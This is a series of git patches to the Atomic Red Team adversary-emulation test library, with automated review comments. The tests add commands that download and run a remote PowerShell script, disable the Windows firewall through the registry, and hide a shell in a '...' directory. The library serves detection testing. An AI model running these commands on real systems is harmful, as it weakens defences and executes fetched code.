@@ -79,7 +79,7 @@ | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | | | | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | -| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | | | | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index fd5147ce..8af77186 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -27709,7 +27709,33 @@ defense-evasion: x_mitre_contributors: - Yossi Weizman, Azure Defender Research Team - Vishwas Manral, McAfee - atomic_tests: [] + identifier: T1036.005 + atomic_tests: + - name: Execute a process from a directory masquerading as the current parent + directory. + auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 + description: 'Create and execute a process from a directory masquerading as + the current parent directory (`...` instead of normal `..`) + +' + supported_platforms: + - macos + - linux + input_arguments: + test_message: + description: Test message to echo out to the screen + type: String + default: Hello from the Atomic Red Team test T1036.005#1 + executor: + name: sh + elevation_required: false + command: | + mkdir $HOME/... + cp $(which sh) $HOME/... + $HOME/.../sh -c "echo #{test_message}" + cleanup_command: | + rm -f $HOME/.../sh + rmdir $HOME/.../ T1556: technique: external_references: diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md new file mode 100644 index 00000000..458839a1 --- /dev/null +++ b/atomics/T1036.005/T1036.005.md @@ -0,0 +1,47 @@ +# T1036.005 - Match Legitimate Name or Location +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005) +
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. + +Adversaries may also use the same icon of the file they are trying to mimic.
+ +## Atomic Tests + +- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory) + + +
+ +## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory. +Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) + +**Supported Platforms:** macOS, Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1| + + +#### Attack Commands: Run with `sh`! + + +```sh +mkdir $HOME/... +cp $(which sh) $HOME/... +$HOME/.../sh -c "echo #{test_message}" +``` + +#### Cleanup Commands: +```sh +rm -f $HOME/.../sh +rmdir $HOME/.../ +``` + + + + + +
From 1531e9d3f0dc5a8e5cf5f01096c7ea8ce6737725 Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Fri, 11 Jun 2021 15:26:30 -0600 Subject: [PATCH 35/84] fix t1105 indent --- atomics/T1105/T1105.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 9ce67778..36360c6d 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -366,12 +366,12 @@ atomic_tests: default: 1 dependencies: - - description: | - The whois and timeout commands must be present - prereq_command: | - which whois && which timeout - get_prereq_command: | - echo "Please install timeout and the whois package" + - description: | + The whois and timeout commands must be present + prereq_command: | + which whois && which timeout + get_prereq_command: | + echo "Please install timeout and the whois package" executor: name: sh From 871a3584b86c3b5cb60b2f08b949827d2c60d9b3 Mon Sep 17 00:00:00 2001 From: Jil Larner Date: Tue, 15 Jun 2021 17:44:48 +0200 Subject: [PATCH 36/84] Fixed bug in script path (#1517) The path was referring to T1595.002 instead of T1082, where the script resides. Due to the moved requested in #1320 and missed. --- atomics/T1082/T1082.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index 1f5b2ab7..95e3ebc2 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -121,7 +121,7 @@ atomic_tests: vbscript: description: Path to sample script type: String - default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs + default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs executor: command: 'cscript #{vbscript}' name: powershell From 84f9f9ffdd2a132f4574d98d27f67a7fc2bc3ad2 Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Tue, 15 Jun 2021 15:45:23 +0000 Subject: [PATCH 37/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1082/T1082.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8af77186..8212b5e3 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -52704,7 +52704,7 @@ discovery: vbscript: description: Path to sample script type: String - default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs + default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs executor: command: 'cscript #{vbscript}' name: powershell diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 9a0e9550..7c4d1d40 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -266,7 +266,7 @@ For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/deta #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| vbscript | Path to sample script | String | PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs| +| vbscript | Path to sample script | String | PathToAtomicsFolder\T1082\src\griffon_recon.vbs| #### Attack Commands: Run with `powershell`! From 7a73723a7b9b61eec382c68aa7e81cec577e162a Mon Sep 17 00:00:00 2001 From: SecurityShrimp Date: Tue, 15 Jun 2021 10:46:01 -0500 Subject: [PATCH 38/84] Update T1059.005.yaml (#1518) added lines to enable TLS v 1.2 Co-authored-by: Carrie Roberts --- atomics/T1059.005/T1059.005.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml index df243080..61f9bc20 100644 --- a/atomics/T1059.005/T1059.005.yaml +++ b/atomics/T1059.005/T1059.005.yaml 
@@ -54,6 +54,7 @@ atomic_tests: Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" cleanup_command: | @@ -88,8 +89,9 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: | Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore - name: powershell \ No newline at end of file + name: powershell From a78c0ae822c7bb840730abf991d3a3667aabb798 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 15 Jun 2021 15:46:52 +0000 Subject: [PATCH 39/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 +++- atomics/T1059.005/T1059.005.md | 2 ++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8212b5e3..3e83219d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
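Review bot: The added `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line in both hunks (the "Exec" test at @@ -54 and the "Extract" test at @@ -88) assigns the protocol set instead of extending it, so any protocol the host already had enabled (for example TLS 1.3 on newer .NET builds) is dropped for the rest of the PowerShell session, and this process-wide state is never restored by `cleanup_command`. The usual form that guarantees TLS 1.2 without discarding the existing set is `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12`. Since invoke-atomicredteam presumably runs each test in its own process the side effect is likely harmless, but a short comment above the line such as `# GitHub requires TLS 1.2; older .NET defaults make the iwr download fail` would record why the line exists so it is not removed as noise later.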
@@ -60918,6 +60918,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine @@ -60955,7 +60956,8 @@ execution: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n" cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index b4f09402..42e8cd66 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -84,6 +84,7 @@ You can validate this by opening WinWord -> File -> Account -> About Word ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" ``` 
@@ -137,6 +138,7 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" ``` From 9f397c259c8ea3f9123f23b203f2f82a2b9514ea Mon Sep 17 00:00:00 2001 From: BlueTeamOps <1480956+blueteam0ps@users.noreply.github.com> Date: Wed, 16 Jun 2021 01:49:55 +1000 Subject: [PATCH 40/84] Added Disabling Firewall via Registry (#1516) Co-authored-by: Carrie Roberts --- atomics/T1562.004/T1562.004.yaml | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index e123cf1b..24eeec66 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml 
@@ -36,6 +36,19 @@ atomic_tests: cleanup_command: | netsh advfirewall set currentprofile state on >nul 2>&1 name: command_prompt +- name: Disable Microsoft Defender Firewall via Registry + auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 + description: | + Disables the Microsoft Defender Firewall for the public profile via registry + Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f + cleanup_command: | + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f + name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 description: | From 62f0f37fc663bfa36846890978c719c51a2ab07d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 15 Jun 2021 15:50:17 +0000 Subject: [PATCH 41/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 6b32dc04..03f6048b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -719,3 +719,4 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 4f08197a-2a8a-472d-9589-cd2895ef22ad d546a3d9-0be5-40c7-ad82-5a7d79e1b66b 812c3ab8-94b0-4698-a9bf-9420af23ce24 +afedc8c4-038c-4d82-b3e5-623a95f8a612 From 8a67b64944ac8c4e7d7ca01deac11c6fb5fb2727 Mon Sep 17 00:00:00 2001 
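Review bot: The new "Disable Microsoft Defender Firewall via Registry" test writes to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile` but its `executor:` block sets no `elevation_required`, and the atomic schema treats a missing attribute as false, so the runner would presumably launch the `reg add` without admin rights and the test would fail with access denied instead of being reported as needing elevation; add `elevation_required: true` under `executor:`. The description also says the cleanup re-enables the firewall "for the current profile", while both commands target only `PublicProfile`, so the wording should say public profile to match the registry path. Finally, the cleanup forces `EnableFirewall` to `1` unconditionally, which restores the common default rather than whatever value was present before the test ran; if that matters for the hosts this is run on, the description should state that the cleanup assumes the firewall was previously enabled for the public profile.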
From: CircleCI Atomic Red Team doc generator Date: Tue, 15 Jun 2021 15:50:23 +0000 Subject: [PATCH 42/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 9 ++-- atomics/Indexes/Indexes-CSV/windows-index.csv | 9 ++-- atomics/Indexes/Indexes-Markdown/index.md | 9 ++-- .../Indexes/Indexes-Markdown/windows-index.md | 9 ++-- atomics/Indexes/index.yaml | 17 +++++++ atomics/T1562.004/T1562.004.md | 47 +++++++++++++++---- 6 files changed, 76 insertions(+), 24 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 2c3bac55..a2bca221 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -272,10 +272,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit L defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell -defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard 
Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index cbe6e63b..f7877e90 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -186,10 +186,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell -defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard 
Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 2c80658d..da7cfd0c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -501,10 +501,11 @@ - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #1: Disable firewall [linux] - Atomic Test #2: Disable Microsoft Defender Firewall [windows] - - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows] - - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows] - - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows] - - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows] + - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows] + - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows] + - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows] + - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows] + - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows] - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #1: Disable syslog [linux] - Atomic Test #2: Disable Cb Response [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 7bc31d02..5441311e 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md 
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -361,10 +361,11 @@ - Atomic Test #4: Clear Windows Audit Policy Config [windows] - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #2: Disable Microsoft Defender Firewall [windows] - - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows] - - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows] - - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows] - - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows] + - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows] + - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows] + - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows] + - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows] + - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows] - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #10: Unload Sysmon Filter Driver [windows] - Atomic Test #11: Uninstall Sysmon [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3e83219d..e4882d57 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -22379,6 +22379,23 @@ defense-evasion: ' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 +' + name: command_prompt + - name: Disable Microsoft Defender Firewall via Registry + auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 + description: | + Disables the Microsoft Defender Firewall for the public profile via registry + Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" + /v "EnableFirewall" /t REG_DWORD /d 0 /f + +' + cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" + /v "EnableFirewall" /t REG_DWORD /d 1 /f + ' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index ea17f6a6..3c2b9eea 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md 
@@ -10,13 +10,15 @@ Modifying or disabling a system firewall may enable adversary C2 communications, - [Atomic Test #2 - Disable Microsoft Defender Firewall](#atomic-test-2---disable-microsoft-defender-firewall) -- [Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall) +- [Atomic Test #3 - Disable Microsoft Defender Firewall via Registry](#atomic-test-3---disable-microsoft-defender-firewall-via-registry) -- [Atomic Test #4 - Opening ports for proxy - HARDRAIN](#atomic-test-4---opening-ports-for-proxy---hardrain) +- [Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-4---allow-smb-and-rdp-on-microsoft-defender-firewall) -- [Atomic Test #5 - Open a local port through Windows Firewall to any profile](#atomic-test-5---open-a-local-port-through-windows-firewall-to-any-profile) +- [Atomic Test #5 - Opening ports for proxy - HARDRAIN](#atomic-test-5---opening-ports-for-proxy---hardrain) -- [Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-6---allow-executable-through-firewall-located-in-non-standard-location) +- [Atomic Test #6 - Open a local port through Windows Firewall to any profile](#atomic-test-6---open-a-local-port-through-windows-firewall-to-any-profile) + +- [Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-7---allow-executable-through-firewall-located-in-non-standard-location)
@@ -84,7 +86,36 @@ netsh advfirewall set currentprofile state on >nul 2>&1

-## Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall +## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry +Disables the Microsoft Defender Firewall for the public profile via registry +Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f +``` + +#### Cleanup Commands: +```cmd +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f +``` + + + + + +
+
+ +## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services... @@ -114,7 +145,7 @@ netsh advfirewall reset >nul 2>&1

-## Atomic Test #4 - Opening ports for proxy - HARDRAIN +## Atomic Test #5 - Opening ports for proxy - HARDRAIN This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf @@ -144,7 +175,7 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp

-## Atomic Test #5 - Open a local port through Windows Firewall to any profile +## Atomic Test #6 - Open a local port through Windows Firewall to any profile This test will attempt to open a local port defined by input arguments to any profile **Supported Platforms:** Windows @@ -177,7 +208,7 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null

-## Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location +## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location This test will attempt to allow an executable through the system firewall located in the Users directory **Supported Platforms:** Windows From 799ea20a954ce926d8f23d06c507d213ccfa7aca Mon Sep 17 00:00:00 2001 From: BaffledJimmy Date: Wed, 16 Jun 2021 05:39:17 +0100 Subject: [PATCH 43/84] Amend regkey path for Macro security level (#1515) * Amend regkey path for Macro security level As shown in this image - https://www.mdsec.co.uk/wp-content/uploads/2020/11/image-2-768x191.png.webp - the correct regkey is \Level\. The existing ```reg add``` syntax will not create a Level value with a DWORD of 4 (disable all). Also changed the regkey to 1 (enable all macros without notif). ``` 4 = Disable all macros without notification 3 = Notifications for digitally signed macros, all other macros disabled 2 = Notifications for all macros 1 = Enable all Macros ``` * Update T1137.yaml * Update T1137.md --- atomics/T1137/T1137.md | 21 +++++++++++++++------ 